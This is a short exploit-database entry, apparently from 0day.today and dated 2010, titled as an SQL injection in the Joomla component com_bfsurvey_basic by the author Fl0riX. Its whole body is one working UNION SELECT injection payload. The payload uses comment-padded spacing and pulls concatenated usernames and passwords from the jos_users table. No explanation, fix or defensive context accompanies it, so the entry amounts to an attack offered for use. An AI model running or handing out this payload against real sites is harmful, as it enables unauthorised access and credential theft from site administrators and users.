id: 10596
date: 01/03/2010
title: Joomla Component com_bfsurvey_basic SQL Injection Vulnerability
author: Fl0riX
cves: 

===============================================================
Joomla Component com_bfsurvey_basic SQL Injection Vulnerability
===============================================================

[+] Joomla Component com_bfsurvey_basic SQL Injection Vulnerability
 
[+] Author: FL0RiX 
 
############################################################################################################################
 
[+] Exploit;
 
     [+] null/**/and/**/1=0/**/union/**/select/**/concat(username,0x3a,password)fl0rix,user(),user()/**/from/**/jos_users--
 
 
############################################################################################################################



#  0day.today [2023-03-22]  #